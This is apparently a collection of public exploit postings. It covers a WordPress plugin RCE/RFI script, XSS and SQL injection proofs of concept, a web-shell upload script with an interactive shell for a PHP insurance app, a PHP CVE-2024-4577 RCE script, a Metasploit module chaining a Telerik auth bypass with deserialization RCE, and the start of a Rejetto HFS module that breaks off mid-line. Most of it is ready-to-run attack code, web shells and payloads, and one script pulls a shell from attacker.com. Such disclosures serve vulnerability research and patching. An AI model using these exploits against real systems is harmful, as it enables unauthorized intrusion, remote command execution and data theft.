<pre><code><br />Exploit for Remote Code Execution (RCE) in RFC WordPress 6.0.8<br /> <br />import requests<br />import sys<br /> <br />target = "https://target.com"<br /> <br /># Exploit for Remote Code Execution (RCE) in RFC WordPress 6.0.8<br />#CODE BY E1.Coders "The King of Security"<br />def exploit_rfc_wordpress():<br /> url = f"{target}/wp-content/plugins/rfc-wordpress/rfc.php"<br /> payload = "<?php system($_GET['cmd']); ?>"<br /> <br /> try:<br /> response = requests.post(url, data={"rfc_action": "save_settings", "rfc_settings": payload})<br /> if response.status_code == 200:<br /> print("RCE exploit successful!")<br /> print(f"Visit {url}?cmd=whoami to execute commands")<br /> else:<br /> print("RCE exploit failed.")<br /> except requests.exceptions.RequestException as e:<br /> print(f"Error: {e}")<br /> <br /># Exploit for Remote File Inclusion (RFI) in RFC WordPress<br />def exploit_rfi_rfc_wordpress():<br /> url = f"{target}/wp-content/plugins/rfc-wordpress/rfc.php?rfc_action=save_settings"<br /> payload = "http://attacker.com/shell.php"<br /> <br /> try:<br /> response = requests.post(url, data={"rfc_settings": payload})<br /> if response.status_code == 200:<br /> print("RFI exploit successful!")<br /> print(f"Visit {target}/wp-content/plugins/rfc-wordpress/shell.php to execute commands")<br /> else:<br /> print("RFI exploit failed.")<br /> except requests.exceptions.RequestException as e:<br /> print(f"Error: {e}")<br /> <br />if __name__ == "__main__":<br /> exploit_rfc_wordpress()<br /> exploit_rfi_rfc_wordpress()<br /> <br /></code></pre>
<pre><code>Exploit Title: Premium Support Tickets For WHMCS Reflected XSS<br />Exploit Author: Sajibe Kanti<br />Vendor: ModulesGarden<br />Vendor Homepage:<br />https://www.modulesgarden.com/products/whmcs/premium-support-tickets<br />Product Name: Premium Support Tickets For WHMCS<br />Product Version: v1.2.10<br />Tested Version: WHMCS 8.10.1<br />Tested on: Windows 10<br />Vulnerabilities Discovered Date: 29/04/2024<br /><br />Description:<br />The Premium Support Tickets For WHMCS plugin by ModulesGarden is vulnerable<br />to a reflected cross-site scripting (XSS) attack. This vulnerability allows<br />an attacker to inject malicious JavaScript code into the "error&msg="<br />parameter of the submitticket.php page, leading to the execution of<br />arbitrary code in the context of the victim's browser.<br /><br /><br />Proof of Concept (POC):<br />1. Identify a website that utilizes the Premium Support Tickets For WHMCS<br />plugin by ModulesGarden.<br />2. Navigate to the ticket submission page (submitticket.php).<br />3. Select any department to open a new ticket.<br />4. If you lack support credit points, you will receive an error message<br />with the parameter "error&msg=clientarea_message_cantcreateinthisdept".<br />5. Inject your payload into the "error&msg=" parameter.<br />6. Construct the following URL with your payload:<br /><br />https://example.com/submitticket.php?PremiumSupportTickets=error&msg=%22/%3E%3CsvG%20onLoad=alert(/xss/)%3E<br />7. Replace the payload with your desired XSS payload:<br /> "<svg/onLoad=alert(/OPENBUGBOUNTY/)>"<br />8. Visit the modified URL in your browser.<br />9. Observe the XSS popup indicating successful exploitation of the<br />vulnerability.<br /><br /><br />Impact:<br />Successful exploitation of this vulnerability could allow an attacker to<br />execute arbitrary JavaScript code in the context of an authenticated user's<br />browser session. This could lead to various attacks, including but not<br />limited to:<br /><br />- Theft of sensitive information (session cookies, credentials, etc.)<br />- Phishing attacks targeting users of the affected WHMCS instance<br />- Defacement of the website or redirection to malicious content<br />- Browser-based attacks such as keylogging or screen capturing<br /><br />Note: This exploit is for educational purposes only. Unauthorized access to<br />or modification of systems is illegal and unethical. Always obtain proper<br />authorization before testing or exploiting vulnerabilities.<br /></code></pre>
<pre><code># Exploit Title: Life Insurance Management Stored System- cross-site scripting (XSS)<br /># Exploit Author: Aslam Anwar Mahimkar<br /># Date: 18-05-2024<br /># Category: Web application<br /># Vendor Homepage: https://projectworlds.in/<br /># Software Link: https://projectworlds.in/life-insurance-management-system-in-php/<br /># Version: AEGON LIFE v1.0<br /># Tested on: Linux<br /># CVE: CVE-2024-36599<br /><br /># Description:<br />----------------<br /><br />A stored cross-site scripting (XSS) vulnerability in Aegon Life v1.0 allows attackers to execute arbitrary web scripts via a crafted payload injected into the name parameter at insertClient.php.<br /><br /><br /># Payload:<br />----------------<br /><br /><script>alert(document.domain)</script><br /><br /><br /># Attack Vectors:<br />-------------------------<br /><br />To exploit this vulnerability use <script>alert(document.domain)</script> when user visit Client.php we can see the XSS.<br /><br /># Burp Suite Request:<br />----------------------------<br /><br />POST /lims/insertClient.php HTTP/1.1<br />Host: localhost<br />Content-Length: 30423<br />Cache-Control: max-age=0<br />sec-ch-ua: "Not-A.Brand";v="99", "Chromium";v="124"<br />sec-ch-ua-mobile: ?0<br />sec-ch-ua-platform: "Linux"<br />Upgrade-Insecure-Requests: 1<br />Origin: http://localhost<br />Content-Type: multipart/form-data; boundary=----WebKitFormBoundarymKfAe0x95923LzQH<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.60 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-User: ?1<br />Sec-Fetch-Dest: document<br />Referer: http://localhost/lims/addClient.php<br />Accept-Encoding: gzip, deflate, br<br />Accept-Language: en-US,en;q=0.9<br />Cookie: PHPSESSID=v6g7shnk1mm5vq6i63lklck78n<br />Connection: close<br /><br />------WebKitFormBoundarymKfAe0x95923LzQH<br />Content-Disposition: form-data; name="client_id"<br /><br />1716051159<br /><br />------WebKitFormBoundarymKfAe0x95923LzQH<br />Content-Disposition: form-data; name="client_password"<br /><br />password<br /><br />------WebKitFormBoundarymKfAe0x95923LzQH<br />Content-Disposition: form-data; name="name"<br /><br /><script>alert(document.domain)</script><br /><br />------WebKitFormBoundarymKfAe0x95923LzQH<br />Content-Disposition: form-data; name="fileToUpload"; filename="runme.jpg_original"<br /><br />Content-Type: application/octet-stream<br /><br /><br />ÿØÿà<br /><br /></code></pre>
<pre><code># Exploit Title: Life Insurance Management System- Unauthenticated Remote Code Execution (RCE)<br /># Exploit Author: Aslam Anwar Mahimkar<br /># Date: 18-05-2024<br /># Category: Web application<br /># Vendor Homepage: https://projectworlds.in/<br /># Software Link: https://projectworlds.in/life-insurance-management-system-in-php/<br /># Version: AEGON LIFE v1.0<br /># Tested on: Linux<br /># CVE: CVE-2024-36598<br /><br /># Description:<br />----------------<br /><br />-An arbitrary file upload vulnerability in Aegon Life v1.0 allows attackers to execute arbitrary code via uploading a crafted PHP file by adding image/gif magic bytes in payload.<br /><br />-In insertClient.php fileToUpload is only checking for image file but not checking for extensions, also header.php is not properly handling the redirection hence allowing Unauthenticated redirect.<br /><br /><br /># Payload:<br />------------------<br /><br />payload = "GIF89a;'<?php echo shell_exec($_GET[\'cmd\']); ?>'"<br /><br /><br /># RCE via executing exploit:<br />---------------------------------------<br /><br /> # Step : run the exploit in python with this command: python3 shell.py http://localhost/lims/<br /> # will lead to RCE shell.<br /> <br />POC<br />-------------------<br /><br />import argparse<br />import random<br />import requests<br />import string<br />import sys<br /><br />parser = argparse.ArgumentParser()<br />parser.add_argument('url', action='store', help='The URL of the target.')<br />args = parser.parse_args()<br /><br />url = args.url.rstrip('/')<br />random_file = ''.join(random.choice(string.ascii_letters + string.digits) for i in range(10))<br /><br />payload = "GIF89a;'<?php echo shell_exec($_GET[\'cmd\']); ?>'"<br /><br />file = {'fileToUpload': (random_file + '.php', payload, 'text/php')}<br />print('> Attempting to upload PHP web shell...')<br />r = requests.post(url + '/insertClient.php', files=file, data={'agent_id':''}, verify=False)<br />print('> Verifying shell upload...')<br />r = requests.get(url + '/uploads/' + random_file + '.php', params={'cmd':'echo ' + random_file}, verify=False)<br /><br />if random_file in r.text:<br /> print('> Web shell uploaded to ' + url + '/uploads/' + random_file + '.php')<br /> print('> Example command usage: ' + url + '/uploads/' + random_file + '.php?cmd=whoami')<br /> launch_shell = str(input('> Do you wish to launch a shell here? (y/n): '))<br /> if launch_shell.lower() == 'y':<br /> while True:<br /> cmd = str(input('RCE $ '))<br /> if cmd == 'exit':<br /> sys.exit(0)<br /> r = requests.get(url + '/uploads/' + random_file + '.php', params={'cmd':cmd}, verify=False)<br /> print(r.text)<br />else:<br /> if r.status_code == 200:<br /> print('> Web shell uploaded to ' + url + '/uploads/' + random_file + '.php, however a simple command check failed to execute. Perhaps shell_exec is disabled? Try changing the payload.')<br /> else:<br /> print('> Web shell failed to upload! The web server may not have write permissions.')<br /><br />---------------------------------------------------------------------------------------------------------------------------<br /><br />### Can also performed manually.<br /><br /><br />Payload:<br />--------------<br /><br />GIF89a;<br /><?php<br />echo"<pre>";<br />passthru($_GET['cmd']);<br />echo"<pre>";<br />?><br /><br /># Attack Vectors:<br />-------------------------<br /><br />After uploading malicious image can access it to get the shell<br /><br />http://localhost/lims/uploads/shell2.gif.php?cmd=id<br /><br /><br />Burp Suit Request<br />-----------------------------<br /><br />POST /lims/insertClient.php HTTP/1.1<br />Host: localhost<br />Content-Length: 2197<br />Cache-Control: max-age=0<br />sec-ch-ua: <br />sec-ch-ua-mobile: ?0<br />sec-ch-ua-platform: ""<br />Upgrade-Insecure-Requests: 1<br />Origin: http://localhost<br />Content-Type: multipart/form-data; boundary=----WebKitFormBoundary5plGALZGPOOdBlF0<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-User: ?1<br />Sec-Fetch-Dest: document<br />Referer: http://localhost/lims/addClient.php<br />Accept-Encoding: gzip, deflate<br />Accept-Language: en-US,en;q=0.9<br />Connection: close<br /><br />------WebKitFormBoundary5plGALZGPOOdBlF0<br />Content-Disposition: form-data; name="client_id"<br /><br />1716015032<br /><br />------WebKitFormBoundary5plGALZGPOOdBlF0<br />Content-Disposition: form-data; name="client_password"<br /><br />Password<br /><br />------WebKitFormBoundary5plGALZGPOOdBlF0<br />Content-Disposition: form-data; name="name"<br /><br />Test<br /><br />------WebKitFormBoundary5plGALZGPOOdBlF0<br />Content-Disposition: form-data; name="fileToUpload"; filename="shell2.gif.php"<br />Content-Type: application/x-php<br /><br />GIF89a;<br /><?php<br />echo"<pre>";<br />passthru($_GET['cmd']);<br />echo"<pre>";<br />?><br /><br />------WebKitFormBoundary5plGALZGPOOdBlF0<br />Content-Disposition: form-data; name="sex"<br /><br />Male<br /><br />------WebKitFormBoundary5plGALZGPOOdBlF0<br />Content-Disposition: form-data; name="birth_date"<br /><br />1/1/1988<br /><br />------WebKitFormBoundary5plGALZGPOOdBlF0<br />Content-Disposition: form-data; name="maritial_status"<br /><br />M<br /><br />------WebKitFormBoundary5plGALZGPOOdBlF0<br />Content-Disposition: form-data; name="nid"<br /><br />1<br /><br />------WebKitFormBoundary5plGALZGPOOdBlF0<br />Content-Disposition: form-data; name="phone"<br /><br />1<br /><br />------WebKitFormBoundary5plGALZGPOOdBlF0<br />Content-Disposition: form-data; name="address"<br /><br />1<br /><br />------WebKitFormBoundary5plGALZGPOOdBlF0<br />Content-Disposition: form-data; name="policy_id"<br /><br />1<br /><br />------WebKitFormBoundary5plGALZGPOOdBlF0<br />Content-Disposition: form-data; name="agent_id"<br /><br />Agent007<br /><br />------WebKitFormBoundary5plGALZGPOOdBlF0<br />Content-Disposition: form-data; name="nominee_id"<br /><br />1716015032-275794639<br /><br />------WebKitFormBoundary5plGALZGPOOdBlF0<br />Content-Disposition: form-data; name="nominee_name"<br /><br />Test1<br /><br />------WebKitFormBoundary5plGALZGPOOdBlF0<br />Content-Disposition: form-data; name="nominee_sex"<br /><br />1<br /><br />------WebKitFormBoundary5plGALZGPOOdBlF0<br />Content-Disposition: form-data; name="nominee_birth_date"<br /><br />1<br /><br />------WebKitFormBoundary5plGALZGPOOdBlF0<br />Content-Disposition: form-data; name="nominee_nid"<br /><br />1<br /><br />------WebKitFormBoundary5plGALZGPOOdBlF0<br />Content-Disposition: form-data; name="nominee_relationship"<br /><br />1<br /><br />------WebKitFormBoundary5plGALZGPOOdBlF0<br />Content-Disposition: form-data; name="priority"<br /><br />1<br /><br />------WebKitFormBoundary5plGALZGPOOdBlF0<br />Content-Disposition: form-data; name="nominee_phone"<br /><br />1<br />------WebKitFormBoundary5plGALZGPOOdBlF0<br /><br /><br /></code></pre>
<pre><code># Exploit Title: Life Insurance Management System- SQL injection vulnerability.<br /># Exploit Author: Aslam Anwar Mahimkar<br /># Date: 18-05-2024<br /># Category: Web application<br /># Vendor Homepage: https://projectworlds.in/<br /># Software Link: https://projectworlds.in/life-insurance-management-system-in-php/<br /># Version: AEGON LIFE v1.0<br /># Tested on: Linux<br /># CVE: CVE-2024-36597<br /><br /># Description:<br />----------------<br /><br />Aegon Life v1.0 was discovered to contain a SQL injection vulnerability via the client_id parameter at clientStatus.php.Important user data or system data may be leaked and system security may be compromised. Then environment is secure and the information can be used by malicious users.<br /><br /># Payload:<br />------------------<br /><br />client_id=1511986023%27%20OR%201=1%20--%20a <br /><br /># Steps to reproduce<br />--------------------------<br /> -Login with your creds<br /> -Navigate to this directory - /client.php<br /> -Click on client Status<br /> -Will navigate to /clientStatus.php<br /> -Capture the request in burp and inject SQLi query in client_id= filed<br /><br /># Burp Request<br />-------------------<br /><br /><br />GET /lims/clientStatus.php?client_id=1511986023%27%20OR%201=1%20--%20a HTTP/1.1<br />Host: localhost<br />sec-ch-ua: "Not-A.Brand";v="99", "Chromium";v="124"<br />sec-ch-ua-mobile: ?0<br />sec-ch-ua-platform: "Linux"<br />Upgrade-Insecure-Requests: 1<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.60 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7<br />Sec-Fetch-Site: none<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-User: ?1<br />Sec-Fetch-Dest: document<br />Accept-Encoding: gzip, deflate, br<br />Accept-Language: en-US,en;q=0.9<br />Cookie: PHPSESSID=v6g7shnk1mm5vq6i63lklck78n<br />Connection: close<br /><br /></code></pre>
<pre><code># Exploit Title: PHP Windows Remote Code Execution (Unauthenticated)<br /># Exploit Author: Yesith Alvarez<br /># Vendor Homepage: https://www.php.net/downloads.php<br /># Version: PHP 8.3,* < 8.3.8, 8.2.*<8.2.20, 8.1.*, 8.1.29<br /># CVE : CVE-2024-4577<br /><br />from requests import Request, Session<br />import sys<br />import json<br /><br /><br /><br />def title():<br /> print('''<br /> <br /> _______ ________ ___ ___ ___ _ _ _ _ _____ ______ ______ <br /> / ____\ \ / / ____| |__ \ / _ \__ \| || | | || | | ____|____ |____ |<br /> | | \ \ / /| |__ ______ ) | | | | ) | || |_ ______| || |_| |__ / / / / <br /> | | \ \/ / | __|______/ /| | | |/ /|__ _|______|__ _|___ \ / / / / <br /> | |____ \ / | |____ / /_| |_| / /_ | | | | ___) | / / / / <br /> \_____| \/ |______| |____|\___/____| |_| |_| |____/ /_/ /_/ <br /> <br /> <br />Author: Yesith Alvarez<br />Github: https://github.com/yealvarez<br />Linkedin: https://www.linkedin.com/in/pentester-ethicalhacker/<br />Code improvements: https://github.com/yealvarez/CVE/blob/main/CVE-2024-4577/exploit.py<br /> ''') <br /><br /><br />def exploit(url, command): <br /> payloads = {<br /> '<?php echo "vulnerable"; ?>',<br /> '<?php echo shell_exec("'+command+'"); ?>' <br /> } <br /> headers = {<br /> 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0',<br /> 'Content-Type': 'application/x-www-form-urlencoded'}<br /> s = Session()<br /> for payload in payloads:<br /> url = url + "/?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"<br /> req = Request('POST', url, data=payload, headers=headers)<br /> prepped = req.prepare()<br /> del prepped.headers['Content-Type']<br /> resp = s.send(prepped,<br /> verify=False,<br /> timeout=15)<br /> #print(prepped.headers)<br /> #print(url)<br /> #print(resp.headers) <br /> #print(payload)<br /> print(resp.status_code)<br /> print(resp.text)<br /><br /><br />if __name__ == '__main__':<br /> title()<br /> if(len(sys.argv) < 2):<br /> print('[+] USAGE: python3 %s https://<target_url> <command>\n'%(sys.argv[0]))<br /> print('[+] USAGE: python3 %s https://192.168.0.10\n dir'%(sys.argv[0])) <br /> exit(0)<br /> else:<br /> exploit(sys.argv[1],sys.argv[2])<br /> <br /><br /><br /></code></pre>
<pre><code># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br /><br />require 'rex/zip'<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> prepend Msf::Exploit::Remote::AutoCheck<br /> include Msf::Exploit::Remote::CheckModule<br /> include Msf::Exploit::Remote::HttpClient<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Telerik Report Server Auth Bypass and Deserialization RCE',<br /> 'Description' => %q{<br /> This module chains an authentication bypass vulnerability (CVE-2024-4358) with a deserialization vulnerability<br /> (CVE-2024-1800) to obtain remote code execution against Telerik Report Server version 10.0.24.130 and prior.<br /> The authentication bypass flaw allows an unauthenticated user to create a new user with administrative privileges.<br /> The USERNAME datastore option can be used to authenticate with an existing account to prevent the creation of a<br /> new one. The deserialization flaw works by uploading a specially crafted report that when loaded will execute an<br /> OS command as NT AUTHORITY\SYSTEM. The module will automatically delete the created report but not the account<br /> because users are unable to delete themselves.<br /> },<br /> 'Author' => [<br /> 'SinSinology', # CVE-2024-4358 discovery, original PoC and vulnerability write-up<br /> 'Soroush Dalili', # CVE-2024-1800 exploitation assistance<br /> 'Unknown', # CVE-2024-1800 discovery<br /> 'Spencer McIntyre' # MSF module<br /> ],<br /> 'License' => MSF_LICENSE,<br /> 'References' => [<br /> [ 'CVE', '2024-1800' ], # .NET deserialization vulnerability # patched in > 10.0.24.130<br /> [ 'CVE', '2024-4358' ], # Authentication bypass # patched in > 10.0.24.305<br /> [ 'URL', 'https://summoning.team/blog/progress-report-server-rce-cve-2024-4358-cve-2024-1800/' ]<br /> ],<br /> 'Platform' => 'win',<br /> 'Arch' => ARCH_CMD,<br /> 'Targets' => [<br /> [ 'Automatic', {} ],<br /> ],<br /> 'DefaultOptions' => {<br /> 'SSL' => false,<br /> 'RPORT' => 83<br /> },<br /> 'DefaultTarget' => 0,<br /> 'DisclosureDate' => '2024-06-04',<br /> 'Notes' => {<br /> 'Stability' => [ CRASH_SAFE, ],<br /> 'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, ],<br /> 'Reliability' => [ REPEATABLE_SESSION, ],<br /> 'RelatedModules' => [ check_module ]<br /> }<br /> )<br /> )<br /><br /> register_options([<br /> OptString.new('TARGETURI', [ true, 'The base path to the web application', '/' ]),<br /> OptString.new('USERNAME', [false, 'Username for the new account', '']),<br /> OptString.new('PASSWORD', [false, 'Password for the new account', ''])<br /> ])<br /> deregister_options('CheckModule')<br /> end<br /><br /> def check_module<br /> 'auxiliary/scanner/http/telerik_report_server_auth_bypass'<br /> end<br /><br /> def check_options<br /> { 'ACTION' => 'CHECK' }<br /> end<br /><br /> def check<br /> check_code = super<br /><br /> if check_code == CheckCode::Appears<br /> # The auth bypass affects later versions than the RCE, so just filter those out<br /> version = check_code.details[:version]<br /> if version > Rex::Version.new('10.0.24.130')<br /> return CheckCode::Safe("Telerik Report Server #{version} is not affected by CVE-2024-1800.", details: check_code.details)<br /> end<br /> end<br /><br /> check_code<br /> end<br /><br /> def username<br /> @username ||= datastore['USERNAME'].blank? ? Faker::Internet.username : datastore['USERNAME']<br /> end<br /><br /> def password<br /> @password ||= (create_account? && datastore['PASSWORD'].blank?) ? Rex::Text.rand_text_alphanumeric(16) : datastore['PASSWORD']<br /> end<br /><br /> def create_account?<br /> # unless the user specifies a username, use CVE-2024-4358 to create an account for them.<br /> datastore['USERNAME'].blank?<br /> end<br /><br /> def create_account!<br /> # create a new account by exploiting CVE-2024-4358<br /> res = send_request_cgi(<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, 'Startup/Register'),<br /> 'vars_post' => {<br /> 'Username' => username,<br /> 'Password' => password,<br /> 'ConfirmPassword' => password,<br /> 'Email' => Faker::Internet.email(name: username),<br /> 'FirstName' => Faker::Name.first_name,<br /> 'LastName' => Faker::Name.last_name<br /> }<br /> )<br /> fail_with(Failure::Unreachable, 'No response received') if res.nil?<br /> fail_with(Failure::UnexpectedReply, 'Failed to create the new account') unless res.code == 302 && res.headers['location']&.end_with?('/Report/Index')<br /> end<br /><br /> def login<br /> res = send_request_cgi(<br /> 'method' => 'POST',<br /> 'uri' => normalize_uri(target_uri.path, 'Token'),<br /> 'vars_post' => {<br /> 'grant_type' => 'password',<br /> 'username' => username,<br /> 'password' => password<br /> }<br /> )<br /><br /> fail_with(Failure::Unreachable, 'No response received') if res.nil?<br /> fail_with(Failure::UnexpectedReply, 'Failed to login to the target (invalid response)') unless res.headers['content-type']&.start_with?('application/json')<br /> fail_with(Failure::NoAccess, 'Failed to login to the target (invalid credentials)') unless res.code == 200<br /><br /> access_token = res.get_json_document['access_token']<br /> fail_with(Failure::UnexpectedReply, 'Failed to login to the target (missing access token)') unless access_token.present?<br /><br /> print_good("Successfully authenticated as #{username}")<br /> report_creds(username, password)<br /> access_token<br /> end<br /><br /> def build_trdp<br /> zip = Rex::Zip::Archive.new<br /> zip.add_file(<br /> '[Content_Types].xml',<br /> Nokogiri::XML(<<-XML, nil, nil, Nokogiri::XML::ParseOptions::NOBLANKS).to_xml(indent: 0, save_with: 0)<br /> <Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"><br /> <Default Extension="xml" ContentType="application/zip" /><br /> </Types><br /> XML<br /> )<br /> zip.add_file(<br /> 'definition.xml',<br /> Nokogiri::XML(<<-XML, nil, nil, Nokogiri::XML::ParseOptions::NOBLANKS).root.to_xml(indent: 0, save_with: 0)<br /> <Report Width="6.5in" Name="oooo" xmlns="http://schemas.telerik.com/reporting/2021/1.0"><br /> <Items><br /> <ResourceDictionary<br /> xmlns="clr-namespace:System.Windows;Assembly:PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35"<br /> xmlns:System="clr-namespace:System;assembly:mscorlib"<br /> xmlns:Diag="clr-namespace:System.Diagnostics;assembly:System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"<br /> xmlns:ODP="clr-namespace:System.Windows.Data;Assembly:PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35"<br /> ><br /> <ODP:ObjectDataProvider MethodName="Start" ><br /> <ObjectInstance><br /> <Diag:Process><br /> <StartInfo><br /> <Diag:ProcessStartInfo FileName="cmd" Arguments=#{"/c #{payload.encoded}".encode(xml: :attr)}></Diag:ProcessStartInfo><br /> </StartInfo><br /> </Diag:Process><br /> </ObjectInstance><br /> </ODP:ObjectDataProvider><br /> </ResourceDictionary><br /> </Items><br /> </Report><br /> XML<br /> )<br /> zip.pack<br /> end<br /><br /> def send_request_api(resource, method: nil, data: nil)<br /> if method.nil?<br /> method = data.nil? ? 'GET' : 'POST'<br /> end<br /><br /> res = send_request_cgi(<br /> 'method' => method,<br /> 'uri' => normalize_uri(target_uri.path, 'api', resource),<br /> 'headers' => {<br /> 'Authorization' => "Bearer #{@access_token}"<br /> },<br /> 'ctype' => 'application/json',<br /> 'data' => data.nil? ? nil : data.to_json<br /> )<br /> fail_with(Failure::Unreachable, 'No API response received') if res.nil?<br /> fail_with(Failure::UnexpectedReply, "The API responded with status #{res.code}") unless res.code == 200<br /><br /> return nil if res.body.blank?<br /><br /> fail_with(Failure::UnexpectedReply, 'API response content is not JSON data') unless res.headers['content-type']&.start_with?('application/json')<br /><br /> res.get_json_document<br /> end<br /><br /> def exploit<br /> if create_account?<br /> print_status('Creating a new administrator account using CVE-2024-4358')<br /> create_account!<br /> print_good("Created account: #{username}:#{password} (Note: This account will not be deleted by the module)")<br /> end<br /><br /> @access_token = login<br /><br /> categories = send_request_api('reportserver/categories')<br /><br /> report_name = rand_text_alphanumeric(10)<br /> category = categories.sample<br /> fail_with(Failure::Unknown, 'A random category could not be selected') unless category<br /><br /> print_status("Using category: #{category['Name']}")<br /><br /> send_request_api(<br /> 'reportserver/report',<br /> data: {<br /> 'reportName' => report_name,<br /> 'categoryName' => category['Name'],<br /> 'description' => nil,<br /> 'reportContent' => Rex::Text.encode_base64(build_trdp),<br /> 'extension' => '.trdp'<br /> }<br /> )<br /> vprint_status("Created report: #{report_name}")<br /><br /> res_json = send_request_api('reportserver/reports')<br /> @report = res_json.find { |report| report['Name'] == report_name && report['CategoryId'] == category['Id'] }<br /><br /> res_json = send_request_api(<br /> 'reports/clients',<br /> data: {<br /> 'timeStamp' => nil<br /> }<br /> )<br /><br /> client_id = res_json['clientId']<br /> fail_with(Failure::UnexpectedReply, 'Failed to obtain the client ID') unless client_id.present?<br /><br /> begin<br /> send_request_api(<br /> "reports/clients/#{client_id}/parameters",<br /> data: {<br /> 'report' => "NAME/#{category['Name']}/#{report_name}/",<br /> 'parameterValues' => {}<br /> }<br /> )<br /> rescue Msf::Exploit::Failed => e<br /> raise e unless fail_reason == Failure::UnexpectedReply<br /><br /> print_good('The server responded with an error indicating that the payload was executed')<br /> self.fail_reason = Failure::None<br /> end<br /> end<br /><br /> def cleanup<br /> return unless @report && @access_token<br /><br /> print_status("Deleting report '#{@report['Name']}' (ID: #{@report['Id']})")<br /> send_request_api("reportserver/reports/#{@report['Id']}", method: 'DELETE')<br /> end<br /><br /> def report_creds(user, pass)<br /> credential_data = {<br /> module_fullname: fullname,<br /> username: user,<br /> private_data: pass,<br /> private_type: :password,<br /> workspace_id: myworkspace_id,<br /> last_attempted_at: Time.now,<br /> status: Metasploit::Model::Login::Status::SUCCESSFUL<br /> }.merge(service_details)<br /><br /> create_credential_and_login(credential_data)<br /> end<br />end<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::Remote::HttpClient<br /> prepend Msf::Exploit::Remote::AutoCheck<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'Rejetto HTTP File Server (HFS) Unauthenticated Remote Code Execution',<br /> 'Description' => %q{<br /> The Rejetto HTTP File Server (HFS) version 2.x is vulnerable to an unauthenticated server side template<br /> injection (SSTI) vulnerability. A remote unauthenticated attacker can execute code with the privileges<br /> of the user account running the HFS.exe server process. This exploit has been tested to work against version<br /> 2.4.0 RC7 and 2.3m. The Rejetto HTTP File Server (HFS) version 2.x is no longer supported by the maintainers<br /> and no patch is available. Users are recommended to upgrade to newer supported versions.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'sfewer-r7', # Metasploit exploit<br /> 'Arseniy Sharoglazov' # Original finder<br /> ],<br /> 'References' => [<br /> ['CVE', '2024-23692'],<br /> ['URL', 'https://mohemiv.com/all/rejetto-http-file-server-2-3m-unauthenticated-rce/'],<br /> ],<br /> 'DisclosureDate' => '2024-05-25',<br /> 'Platform' => 'win',<br /> 'Arch' => ARCH_CMD,<br /> 'Privileged' => false,<br /> 'Targets' => [<br /> [<br /> # Tested against Rejetto HFS version:<br /> # * 2.4.0 RC7<br /> # * 2.3m<br /> 'Automatic', {}<br /> ],<br /> ],<br /> 'Payload' => {<br /> 'BadChars' => '"'<br /> },<br /> 'DefaultOptions' => {<br /> 'RPORT' => 80<br /> },<br /> 'DefaultTarget' => 0,<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> 'Reliability' => [REPEATABLE_SESSION],<br /> 'SideEffects' => [<br /> IOC_IN_LOGS,<br /> # If the HFS.exe process is run in a desktop session, the payload cmd.exe window will momentarily popup.<br /> SCREEN_EFFECTS<br /> ]<br /> }<br /> )<br /> )<br /><br /> register_options(<br /> [<br /> OptString.new('TARGETURI', [true, 'The base path to the web application', '']),<br /> ]<br /> )<br /> end<br /><br /> def send_ssti_request_cgi(template, opts = {})<br /> opts['vars_get'] ||= {}<br /> opts['headers'] ||= {}<br /><br /> # The 'search' query parameter is echoed into the content before server side template processing occurs on the<br /> # content being processed. Under normal operation any user supplied content will be escaped, so any symbols, which<br /> # are encoded as '%symbol%' and macro which are encoded as '{:macro:}' will be escaped to prevent SSTI.<br /><br /> # However we can force a percent symbol to become un-escaped. This allows us to embed any symbol in the content<br /> # being processed. We can leverage this to force the '%url%' symbol to become unescaped. This will echo back the<br /> # remainder of the un-encoded URL into the server side content.<br /><br /> # To inject our own content, we need to first write a MARKER_UNQUOTE ':}' sequence,<br /> # however this will be filtered. We can then bypass the filtering for ':}' by leveraging the %host% symbol and an<br /> # empty host header value. So ':%host%}' will become ':}' and this will not be escaped. After this happens we can<br /> # perform an arbitrary template injection of any HFS symbols or macros we want.<br /><br /> opts['vars_get'].merge!({<br /> 'search' => "%25#{Rex::Text.rand_text_alpha(1)}%25url%25:%host%}#{template}"<br /> })<br /><br /> # The Host header must be an empty string for the above symbol substitution to bypass the MARKER_UNQUOTE filtering.<br /> opts['headers'].merge!({<br /> 'Host' => ''<br /> })<br /><br /> opts['method'] = 